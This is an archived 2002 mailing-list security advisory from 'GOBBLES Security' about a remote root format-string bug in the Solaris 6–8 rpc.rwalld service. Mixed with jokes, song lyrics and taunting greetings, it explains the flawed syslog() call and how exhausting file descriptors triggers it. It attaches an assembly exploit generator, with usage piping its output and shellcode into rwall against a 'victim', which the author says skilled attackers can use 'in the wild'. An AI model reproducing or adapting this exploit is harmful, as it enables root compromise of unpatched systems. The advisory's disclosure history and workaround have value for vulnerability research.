OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: gobbleshushmail.com
Date: Tue Apr 30 2002 - 08:34:29 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1

    GOBBLES SECURITY ADVISORY #32

    ALERT! REMOTE ROOT HOLE IN DEFAULT INSTALL OF POPULAR OPERATING SYSTEM! ALERT!

    Forward:
    <route> so was fydor trying to make his code unreadable when he write nmap?
    <route> or was that just the fallout of poor planning?
    <route> this is awful
    <route> if ( !victim || !sport || !dport || sd < 0) {
    <route> fprintf(stderr, "send_udp_raw: One or more of your parameters
             suck!\n");
    <route> free(packet);
    <route> return -1;
    <route> }
    <route> This is the program that is used everywhere and written up in
             countless books?
    <route> it's pretty much obscene that this program doesnt use libnet

    Systems Affected:
    Sun Solaris 6, Sun Solaris 7, Sun Solaris 8
    (sparc and x86 versions)

    Threat Level:
    Super duper high.

    Vendor Notification Status:
    Initial advisory sent to Sun Microsystems on Friday, April 5th.

    After long series of email exchange, Sun.com engineers finally begin working
    on developing patch for bug.

    Days later, CERT contact GOBBLES about bug. Dialouge happen then too with
    CERT. Both Sun Microsystems and CERT have promised to make sure that
    GOBBLES name is in both official advisories released. Hey, we do this for
    fame and attention, now that we are no longer weaned we must do something!

    Some time, full disclosure is real pain in ass. Everyone want more and more
    time to get things fixed before advisory is released. Time to grace lists
    with more GOBBLES Advisory.

    Exploit:
    A proof-of-concept exploit for this vulnerability has been attached to the
    bottom of this email. GOBBLES wrote it in way to keep unskilled from using
    it, like security assesment team from Vigilante who not able to tell if
    vulnerability is real or not in opensourced product after reading advisory.
    At the same time, skilled penetrators should not have any trouble using the
    code provided to exploit systems in the wild.

    Don't send GOBBLES email asking for other versions of exploit. Some things
    better left private and given to close friends for their own motivations.
    If you can't figure out how to work with this exploit and get remote root
    from what is provided in the advisory, really there is no reason for you to
    be using an exploit.

    A Few Words:
    There are some thing that GOBBLES have to say, some thing very heartfelt
    that he need to communicate to the world, some thing that best said in song,
    please take time to read lyric and understand what GOBBLES trying to say. . .

    "the sun has blessed
     the rays are gone
     and all the kids have left their tears and gone home,

     sweet 17, sour 29
     and i can't explain myself
     what i'd hoped to find
     you were all so kind
     when i was near,

     and if you're still feeling down
     then maybe you need me around
     to love and hold you
     don't say i hadn't told you so
     maybe you need me around,

     i had no luck
     i had no shame
     i had no cause
     just seventeen days of rain
     and you in my eyes,

     just one more song to slay this earth
     and i can't explain myself just what it's worth
     what was all i had
     but not all i'd need
     and i can't escape the fact that i still bleed,

     and if you're still feeling down
     and if this seems way too loud
     then maybe you need me around,

     i had no voice
     i had no drive
     i had no choice
     i've done my time
     had myself
     had my band
     i had my love
     had no hand in watching it all fall apart

     and if you're still feeling down
     then maybe you need me around
     to lift and scold you
     to send you crashing all right now
     maybe you need me around."

    - -Blissed and Gone, the Smashing Pumpkins

    Description of Problem (Part One):
    One of the default RPC services in Sun Solaris versions 6-8 is has an
    insecure syslog() statement, which allow remote attacker to execute custom
    code as root.

    Hehe, GOBBLES bet you getting pissed because in all this length of advisory,
    still no mention of what is vulnerable, hehehe, ;PPPPpppppppppppppppp. Keep
    control of temper, and keep reading, because you about to find out, hehehe
    GOBBLES is silly today.

    Remotely Exploitable:
    Yes.

    Locally Exploitable:
    Yes.

    Privilage Attained After Exploitation:
    Root.

    Exploit Included:
    As GOBBLES did mention previously, yes. It get you root. Girls will be
    impressed with mailing list reading skills and source code leeching
    technique utilized to gain remote root to Solaris machines. Included
    exploit for Sparc.

    Name of Vulnerable Service:
    $ grep rwall /etc/inetd.conf
    # The rwall server allows others to post messages to users on this machine.
    walld/1 tli rpc/datagram_v wait root /usr/lib/netsvc/rwall/rpc.rwalld rpc.rwalld

    It rwalld that vulnerable. It run as root. Attacker get root from
    exploiting it.

    Description of Problem (Part Two):
    Inside rwall_subr.c we see:

       /*
        * Make sure the wall programs exists, is executeable, and runs
        */
       if (rval == -1 || (wall.st_mode & S_IXUSR) == 0 ||
          (fp = popen(WALL_PROG, "w")) == NULL) {
              syslog(LOG_NOTICE,
                       "rwall message received but could not execute %s",
                       WALL_PROG);
              syslog(LOG_NOTICE, msg);

    Bug easy enough to spot, but now question is, "GOBBLES, friend, how is
    this to be exploited? Faulty syslog() only called if rpc.rwalld can not
    execute /usr/sbin/wall on local system, which mean it only exploitable if
    admin have chmod -x or rm /usr/sbin/wall or something like this, right, so
    why this so such a big deal?"

    To this GOBBLES say, "Friend IDIOT, faulty syslog() is called if anything is
    to make popen() fail, there one other way to exploit bug, which make it
    dangerous and affect all installation of Solaris running rpc.rwalld, is that
    popen() to fail if there no available file descriptors on system."

    This easier to exploit locally on system. For remote exploitation, timing
    is important and thus is race condition. Each new tcp session to running
    service on target host will consume filedescriptor. Then run attached
    exploit to have root handed over, like operator status given to route in
    #phrack with no question ask.

    Patch Available:
    Fucked if GOBBLES knows.

    Suggested Workaround:
    GOBBLES suggest that admin disable rwalld from /etc/inetd.conf until patch
    made available, then restart it, if you wait until patch available until
    upgrade you probably have to do upgrade by reinstalling operating system,
    because now exploit out and probably in hands of less than ethical
    penetrator looking to abuse you in one way or another.

    Security Candy:

    - -begin copy-

    /*
       Remote Root Exploit for Solaris 6-8 rpc.walld

          Usage Instructions:
           1. Compile.
               gcc -o xwall xwall.s
           2. Run.
              (./xwall ; ./shellcode) | rwall victim
            3. Late Easter egg.
              strings xwall

          Note(s):
           Something else must be done to consume FD's on
           victim system. Figure this one out for self.

           This exploit written to be run on Linux. Supplied
           format string is for Sparc Solaris. Provide own
           remote shellcode and use as above described.

       Love,
       GOBBLES Security
       http://www.bugtraq.org
       GOBBLEShushmail.com
    */

    retloc:
    .long 0x41424344
    retaddr:
    .long 0x60bb135
    padding:
    .long 4
    walkcount:
    .long 1
    .globl main
    .type main,function
    main:
    pusha
    movl (padding),%ecx
    jusfhds7fg:
    pushl %ecx
    movl $4,%eax
    movl $1,%ebx
    pushl $0x00000041
    movl %esp,%ecx
    movl $1,%edx
    int $0x80
    popl %ecx
    popl %ecx
    loop jusfhds7fg
    movl %esp,24(%esp)
    pushl $0x42424242
    movl $4,%edx
    movl %esp,%ecx
    movl $1,%ebx
    movl $4,%eax
    int $0x80
    movl (retloc),%eax
    bswapl %eax
    pushl %eax
    subl $4,%ecx
    movl %edx,%eax
    int $0x80
    addl $4,%ecx
    movl %edx,%eax
    int $0x80
    subl $4,%ecx
    popl %eax
    bswapl %eax
    incl %eax
    incl %eax
    bswapl %eax
    pushl %eax
    movl %edx,%eax
    int $0x80
    popl %eax
    movl %esp,%edx
    incl %edx
    xorl %esi,101(%ebp)
    andb %al,111(%edx)
    popa
    pushl %edx
    andb %al,97(%ebx)
    decl %esi
    aaa
    andb %al,111(%ebx)
    incl %esp
    xorl (%ecx),%eax
    movl (walkcount),%ecx
    cmpl $0,%ecx
    je nczxhczjcg89zg89
    pushl %ecx
    movl $4,%edx
    movl $1,%ebx
    pushl $0x78382e25
    cmzxnczxcz8c:
    pushl %ecx
    movl %esp,%ecx
    addl $4,%ecx
    movl $4,%eax
    int $0x80
    popl %ecx
    loop cmzxnczxcz8c
    popl %ecx
    popl %ecx
    nczxhczjcg89zg89:
    movl (retaddr),%edx
    pushl %edx
    shr $16,%edx
    subl %edx,(%esp)
    movw $0,2(%esp)
    pushl %edx
    shll $3,%ecx
    subl %ecx,(%esp)
    movl (padding),%edx
    subl %edx,(%esp)
    subl $16,(%esp)
    movw $0,2(%esp)
    pushl $cznxczxczxh8
    call printf
    movl $1,%eax
    int $0x80
    cznxczxczxh8:
    .string "%%%uc%%hn%%%uc%%hn\n"

    - -begin paste-

    Greets:
    route, because route deserves attention, use libnet it rulez. route, why
    you refuse GOBBLES interview on supposed intrusion on stake subnet that was
    allowed when some malicious local user ran trojaned blackhat warez? GOBBLES
    need to confirm with you if this really did happen, please respond soon...

    Tracymp3.com, the Official Sysadmin Mascot of GOBBLES Security. Thanks for
    letting GOBBLES know to cut out the "leet gr33tz" from advisory, now people
    hold lots of respect for GOBBLES. Thanks Tracy, you're a peach. Next
    advisory will be disclosure of 0day CSS holes in mp3.com's website...

    w00w00 Security Development, publishing advisories at the blinding speed of
    1 per 3 years, and still being the largest active nonprofit security group in
    the world, to the eyes of the public. Disclosure is good when it serve a
    political agenda, hehehehe...

    The Securityfocus Staff, who often reject the legitimate research materials
    of GOBBLES from their lists, but make sure they archive it on their website
    anyways. Thanks for at least giving us some of the credit that we deserve.
    In the future, though, if our submissions don't meet your requirements for
    publication on the lists, don't put them on your website. Enough of this
    double standards bullshit.

    zen-parse, for defining what a whitehat is -- no skill, no ethic, no respect.

    and finally, the beautiful Jennifer Garner, who play Sydney Bristow in tv
    show Alias, who many member of GOBBLES Security is in love with. You win free
    GOBBLES Security tshirt, come to defcon in August to get it, hehehehehehe!

    Hush provide the worlds most secure, easy to use online applications - which solution is right for you?
    HushMail Secure Email http://www.hushmail.com/
    HushDrive Secure Online Storage http://www.hushmail.com/hushdrive/
    Hush Business - security for your Business http://www.hush.com/
    Hush Enterprise - Secure Solutions for your Enterprise http://www.hush.com/

    Looking for a good deal on a domain name? http://www.hush.com/partners/offers.cgi?id=domainpeople

    -----BEGIN PGP SIGNATURE-----
    Version: Hush 2.1
    Note: This signature can be verified at https://www.hushtools.com

    wlwEARECABwFAjzOnwwVHGdvYmJsZXNAaHVzaG1haWwuY29tAAoJEBzRp5chmbAPt4sA
    n0+78j2dzLIufxrdL5A8GcqG/ZPnAKCAnpQVJKw3PYNFN9fFjEfBcGCruQ==
    =jCTV
    -----END PGP SIGNATURE-----